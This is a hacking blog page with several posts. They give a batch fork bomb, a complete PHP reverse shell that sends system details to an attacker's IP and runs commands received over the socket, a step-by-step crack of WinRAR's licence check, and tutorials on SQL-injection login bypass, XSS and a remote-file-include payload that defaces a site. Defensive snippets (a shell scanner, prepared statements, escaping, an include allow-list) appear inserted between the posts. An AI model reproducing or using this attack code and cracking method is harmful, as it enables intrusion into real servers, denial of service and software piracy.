Thursday, June 14, 2012

How to make a Fork Bomb (rabbit virus)



Fork bombs, also known as rabbit viruses, have been around for ages because of how effectively they evade anti-virus software..

Ok, this is the code you type into notepad.exe. Remember to save it as a .bat, or, if you want it in a dormant form, save it as a .txt.

One more thing... I am not responsible if you kill your computer or somebody else's computer, with or without permission..

Now that we have that out of the way, here we go...

Code: .bat

:s
START %0
GOTO :s

Run this boy from a flash drive so you can see how it works, and pull the drive to stop it..

LIKE AND COMMENT..

Back connect Shell | Reverse Shell in PHP



A back-connect shell, also known as a reverse shell, is a piece of code used to host a shell on the server or the victim machine, but instead of sitting there listening for connections (as in the case of a bind shell) it connects back to the attacker's machine.

In this tutorial I'll be making a back-connect shell in PHP-

Code-
back-connect.php
Code: php

<?php
/*********************
@author : Kumaran
@facebook : facebook.com/hackersgrp
@Email : mail4hackersgrp@gmail.com
********************/
ini_set ( 'max_execution_time' , 0 ) ;
?>
<html>
<head>
<title>Back Connect Shell -- PHP</title>
</head>
<body>
<h1>Welcome to Back Connect Control Panel </h1>
<p> Fill in the form Below to Start the Back Connect Service </p>
<?php
if ( isset ( $_GET [ 'port' ] ) &&
isset ( $_GET [ 'ip' ] ) &&
$_GET [ 'port' ] != "" &&
$_GET [ 'ip' ] != ""
)
{
echo "<p>The Program is now trying to connect!</p>" ;
$ip = $_GET [ 'ip' ] ;
$port = $_GET [ 'port' ] ;
$sockfd = fsockopen ( $ip , $port , $errno , $errstr ) ;
if ( $errno != 0 )
{
echo "<font color='red'><b>$errno</b> : $errstr</font>" ;
}
else if ( ! $sockfd )
{
echo "<p>Fatal : An unexpected error occurred when trying to connect!</p>" ;
}
else
{
fputs ( $sockfd ,
" \n ================================================================= \n
Back Connect in PHP \n
Coded by kumaran \n
@author : kumaran
@facebook : facebook.com/hackersgrp
@Email : mail4hackersgrp@gmail.com
\n =================================================================" ) ;
$pwd = shell_exec ( "pwd" ) ;
$sysinfo = shell_exec ( "uname -a" ) ;
$id = shell_exec ( "id" ) ;
$dateAndTime = shell_exec ( "time /t & date /T" ) ;
$len = 1337 ;
fputs ( $sockfd , $sysinfo . " \n " ) ;
fputs ( $sockfd , $pwd . " \n " ) ;
fputs ( $sockfd , $id . " \n \n " ) ;
fputs ( $sockfd , $dateAndTime . " \n \n " ) ;
while ( ! feof ( $sockfd ) )
{
$cmdPrompt = "(Shell)[$]>" ;
fputs ( $sockfd , $cmdPrompt ) ;
$command = fgets ( $sockfd , $len ) ;
fputs ( $sockfd , " \n " . shell_exec ( $command ) . " \n \n " ) ;
}
fclose ( $sockfd ) ;
}
}
else
{
?>
<table align= "center" >
<tr>
<td>
<form method= "GET" >
<table style= "border-spacing: 6px;" >
<tr>
<td>Port</td>
<td>
<input style= "width: 200px;" name= "port" value= "31337" />
</td>
</tr>
<tr>
<td>IP </td>
<td><input style= "width: 100px;" name= "ip" size= '5' value= "127.0.0.1" /></td>
</tr>
<tr>
<td>
<input style= "width: 90px;" class = "own" type= "submit" value= "Connect back:D!" />
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
<p align= "center" style= "color: red;" >Note : After clicking the Submit button, the browser will keep loading continuously. Don't close this window unless you are done!</p>
<?php
}
?>

It's as easy as a couple of clicks to make it work and to use..!
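As an added, defender-side example (not code from the original post): a small PHP scanner that flags files in a web root pairing an outbound socket call with a command-execution call, which is exactly the combination back-connect.php relies on (fsockopen plus shell_exec). The function lists and the constructed sample are my own.

```php
<?php
// Added, defender-side example (not code from the original post): flag PHP
// files that call both an outbound-socket function and a command-execution
// function, the pairing back-connect.php above relies on. Function lists are
// my choice; token_get_all() keeps matches out of strings and comments.
const SOCKET_FUNCS = ['fsockopen', 'pfsockopen', 'socket_create', 'socket_connect', 'stream_socket_client'];
const EXEC_FUNCS   = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open'];

/** Distinct function names the source calls (method calls such as $pdo->exec() also match; review hits by hand). */
function calledFunctions(string $source): array {
    $tokens = token_get_all($source);
    $n = count($tokens); $calls = [];
    for ($i = 0; $i < $n; $i++) {
        if (!is_array($tokens[$i]) || $tokens[$i][0] !== T_STRING) {
            continue;
        }
        $j = $i + 1;                                   // skip whitespace after the name
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j < $n && $tokens[$j] === '(') {           // a name followed by "(" is a call
            $calls[strtolower($tokens[$i][1])] = true;
        }
    }
    return array_keys($calls);
}

/** Which socket and exec functions one source string calls. */
function scanSource(string $source): array {
    $calls = calledFunctions($source);
    return [
        'socket' => array_values(array_intersect($calls, SOCKET_FUNCS)),
        'exec'   => array_values(array_intersect($calls, EXEC_FUNCS)),
    ];
}

/** Walk a web root and return the .php files that hit both categories. */
function scanWebroot(string $dir): array {
    $hits = [];
    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $f) {
        if (strtolower($f->getExtension()) !== 'php') { continue; }
        $r = scanSource(file_get_contents($f->getPathname()));
        if ($r['socket'] && $r['exec']) { $hits[$f->getPathname()] = $r; }
    }
    return $hits;
}
// Constructed sample reproducing the core of back-connect.php (not a real file on disk).
$sample = '<?php $s = fsockopen($_GET["ip"], (int)$_GET["port"]); while (!feof($s)) { fputs($s, shell_exec(fgets($s))); }';
print_r(scanSource($sample));   // socket => [fsockopen], exec => [shell_exec]
```

Run scanWebroot('/var/www') (or wherever the document root is) from cron and diff the result against the previous run; a new hit in an upload or cache directory is worth a look.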

Don't forget to like and comment..

Monday, June 04, 2012

Step-by-Step Guide to Crack WinRAR



I will be writing about the challenge I got on FB, where I cracked WinRAR 3.80 using a disassembler, and will tell you the same here. You can crack any version of WinRAR using this method, need not pay the registration fee, and can do it all by yourself, easily. Furthermore, major software is cracked the same way; the methodology just gets a bit more complex. This tutorial is intended for those who are new to cracking and disassembling.

*This tutorial is intended for educational purposes only*

The Tools-

To perform this hack you will need -
  1. Any disassembler (I use Hacker's Disassembler and Hview)
  2. Resource Hacker
  3. A patch creator (use Universal Patch Creator or Code Fusion)
You will be able to get them via Google..

How to Crack ?

You need a bit of knowledge of assembly language; in case you don't have it, just memorise the steps and it will work any time, every time. Download the latest version of WinRAR from their website and install it.
I will be cracking WinRAR 3.80 here (cuz I already have it:P ). This is basically a 2-step process (4 steps, if you want to do things with a professional touch, period).


Now copy the WinRAR.exe file to the desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address

Now launch Hacker's Disassembler and load the copy in it.

The disassembler will disassemble the executable into assembly code. Now you need to search for strings used in the WinRAR program. Press Ctrl + F, type "evaluation" without quotes, and search the assembly code. Hit enter…

After you have reached this block of code by searching, look at the block of code above it. There you will find that some values are compared and then execution jumps to some other function. Now look carefully: the "evaluation copy" function must be invoked after some specific condition is met. We need to find that condition in the code and change it so that the program doesn't check for it.

In the code above you can see this -
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
This is the code responsible for validating you as a legal user :) . Just note down the memory address of the jump (JNE) to some other memory location. In this case, note down 00444B71.
Note : For any WinRAR version, this code and memory address might be different, but the JNE will be the same. Just note down the respective memory address of the check.
Now you need to search for the code that brings up that ugly nag screen "Please purchase WinRAR license" after your 40-day trial period is over. For this, look over your toolbar and click on "D", which stands for looking for Dialog references.


Now in the dialog box that opens, search for "please" and you will get the reference as -
ID-REMINDER, "Please purchase WinRAR license"

Double click on it and you will reach the subsequent code.

The code will be something like
* String: "REMINDER"
0048731A: 68EB5E4B00 push 004B5EEB
Just note the memory address that invokes the REMINDER dialog. In this case it's 0048731A. Note it down.

Note : For any WinRAR version, this code and memory address might be different, but the REMINDER memory address code will always PUSH something. Just note down the respective memory address that does the PUSH.

Step 2 – Fixing and Patching

Now in this step we will patch the values at the memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker's Disassembler into Hview.


After you have loaded it, you will see the code is unreadable. It's just like opening an EXE file in Notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see the code in the form of assembly code and memory addresses.


After you have done that, you need to search for the memory addresses you noted down earlier. Just hit F5 and a search box will appear. Now you need to enter the memory address. To do that, enter a "." and then type the memory address, leaving out the leading "00". The "." stands in for the "00", i.e. -
Type .444B71 in place of 00444B71


and search in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code. Now make the following changes –


After you have done it, save it by pressing F9.
Now search for the next memory location by pressing F5 and entering it. Reach it and make the following changes by pressing F3 -



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats…You have cracked WinRAR :) Replace the original WinRAR.exe with this copy of winrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE

Now that you have a 100% working version of the EXE, you might want to change your registration information in WinRAR. To do this, you can use Resource Hacker.



Launch Resource Hacker and load the copy of winrar.exe in it



Now go to DIALOG –> expand the tree –> ABOUT RARDLG and click it. Now find the Trial copy line and replace it with your favorite one :P



and click on Compile Script button.


Now save the file with any name on your desktop or any location whatsoever.




Now you have a fully patched WinRAR.exe file :) ) You can either use it, or distribute it like a real cracker. If you want to learn that, move on to the next step.

Step 4 – Creating a working Patch (or giving Professional touch :P )

I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version, just like the ones you have downloaded at any time in your life from any crack and keygen website.

Launch Patch Creator and click on Add New Project. Enter the project information and click on Save.


Click on Add –> Offset patch



After you have done that, double click on Offset patch and then
  1. Give the path of the original winrar.exe
  2. Give the path of the unmodified winrar.exe (again)
  3. Give the path of the fully patched winrar.exe (i.e. the cracked winrar.exe in this case)
  4. Click on Compare and it will show the differences between both files
  5. Click on Save.


Now in the next window, click on Create Patch and save it. The patch will be created. Now copy it into the WinRAR installation directory and hit Patch, it WILL


Congrats, you have created a patch of your own and have learned to crack WinRAR :)


You can crack other software in the same way… just practice, debug and disassemble and you will get the hang of it



:)

Saturday, June 02, 2012

Basic Website Hacking Tutorial for beginners


Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...


SQL Injection

SQL injection is the act of injecting your own, custom-crafted SQL commands into a web script so that you can manipulate the database any way you want. Some example uses of SQL injection: bypass login verification, add a new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.

Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:

<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
// form fields reconstructed to match the $_POST['u'] / $_POST['p'] reads above
echo("<form method=post>
<input type=text name=u>
<input type=password name=p>
<input type=submit>
</form>");
} else {
// user input is spliced straight into the query string: this is the injection point
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}
?>

Basically what this code does is take the username and password input and fetch the user's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw a "'" into the inputs and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection, which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement and just let ourselves in. To do this, we would simply put "Administrator" in the username box and "' OR 1=1--" into the password box; the resulting SQL query run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it ignores the password requirement: as we all know, the logic of "OR" only requires one side to be true for the whole condition to succeed, and since 1 always equals 1, it works. The "--" is the comment marker in SQL, which makes it ignore everything after it; otherwise the last "'" would break the syntax and just cause the query to fail.
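The hardened counterpart of login.php, added here and not part of the original tutorial: the same lookup done with a PDO prepared statement, demonstrated against a constructed in-memory SQLite table so the "' OR 1=1--" payload above can be seen failing. The table layout follows the post (users/username/password/IP); everything else is my assumption.

```php
<?php
// Added example, not from the original tutorial: login.php's lookup with the
// query parameterised through PDO, so "' OR 1=1--" is compared literally as a
// password instead of rewriting the WHERE clause.

function lookupUser(PDO $db, string $user, string $pass): ?array {
    // Placeholders travel separately from the SQL text; the driver never
    // splices $user or $pass into the statement, so quotes and "--" are inert.
    $stmt = $db->prepare('SELECT `IP` FROM `users` WHERE `username` = :u AND `password` = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
// (Real code should store password_hash() output and check it with
//  password_verify(); plaintext is kept here only to mirror the post's schema.)

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT, IP TEXT)');
$db->exec("INSERT INTO users VALUES ('Administrator', 'correct horse', '10.0.0.1')");

// The post's payload no longer gets past the check.
var_dump(lookupUser($db, 'Administrator', "' OR 1=1--"));    // NULL
var_dump(lookupUser($db, 'Administrator', 'correct horse'));  // array(1) { ["IP"]=> "10.0.0.1" }
```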

XSS (Cross-Site Scripting)
This vulnerability allows an attacker's input to be sent to unsuspecting victims. The primary usage of this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time).

Example Vulnerable Code – search.php (PHP)
PHP Code:

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
// $s is echoed back unencoded: this is the reflection point
echo("You searched for $s. There were no results found");
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see the word XSS rendered in red; else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=// ". This will output "You searched for // . There were no results found" (HTML) and, assuming the target's browser supports JS (JavaScript), which all modern browsers do unless the setting is turned off, it will redirect them to abc.
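A hardened search.php, added here as an example that is not from the original tutorial: the reflected value is encoded for each of the three output contexts it lands in (HTML text, attribute, URL), so the <font color=red>XSS</font> probe renders as literal text instead of markup. The extra form and link are my additions to show the attribute and URL cases.

```php
<?php
// Added example, not from the original tutorial: search.php rewritten so the
// reflected parameter is encoded for each context it lands in. With this in
// place the probe "<font color=red>XSS</font>" shows up as literal text.

function esc(string $s): string {
    // HTML text and attribute context; ENT_QUOTES covers both quote styles.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderSearchPage(string $s): string {
    $html  = '<p>You searched for ' . esc($s) . '. There were no results found</p>' . "\n";
    // Same value re-used in an attribute: still esc(), and the quotes are mandatory.
    $html .= '<form><input name="search" value="' . esc($s) . '"></form>' . "\n";
    // Same value in a URL query string: percent-encode first, then HTML-encode the URL.
    $html .= '<a href="' . esc('search.php?search=' . urlencode($s)) . '">repeat search</a>' . "\n";
    return $html;
}

header('Content-Type: text/html; charset=UTF-8');  // declare the charset we encoded for
$s = $_GET['search'] ?? '';
if (PHP_SAPI === 'cli') {                           // constructed probe for a command-line run
    $s = '<font color=red>XSS</font>';
}
echo renderSearchPage($s);
// <p>You searched for &lt;font color=red&gt;XSS&lt;/font&gt;. There were no results found</p> ...
```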

RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file and have it parsed and executed on the local server.

Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI, but may still be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
and then we view "index.php?p=http://our.site.com/malicious.php"; our malicious code will then be run on their server, and by doing so, their site will simply say 'Hacked' now.
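A hardened index.php, added here and not part of the original tutorial: the p parameter selects a page from an allow-list instead of being passed straight to include(), with a realpath check as a second layer. The pages/ directory and the page names are my assumptions; with this in place both probes above ("p=http://www.google.com/" and "p=/etc/passwd") fall through to the default page.

```php
<?php
// Added example, not from the original tutorial: index.php with the page
// parameter mapped through an allow-list instead of handed to include().
// Keep allow_url_include=Off in php.ini as well (the default), which blocks
// the http:// case at the engine level regardless of application code.

const PAGES = [                 // assumed page set; keys are the only values accepted
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/** Resolve the user-supplied page key to a file path, or null if not allowed. */
function resolvePage(?string $p): ?string {
    if ($p === null || !array_key_exists($p, PAGES)) {
        return null;            // unknown key: the filesystem is never consulted
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$p]);
    // Second layer: the resolved file must still sit under the pages directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolvePage($_GET['p'] ?? null) ?? __DIR__ . '/pages/home.php';
include $target;
```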

Friday, June 01, 2012

Warning: Internet to face global outage on July 9


A virus that entered, infected and took control of computers across the world might cause their users to lose access to the internet in July.. As I warned everyone about this earlier..

A group of hackers across the world took control of infected computers in an online advertising scam..

Around 350,000 PC users have machines infected with an invisible, undetectable 'Trojan' computer virus that sends users to unintended and illegal sites. After July 9, infected users won't be able to connect to the internet.

Look at previous posts for the defense method, or Click Here

 
Design by Secure Hackers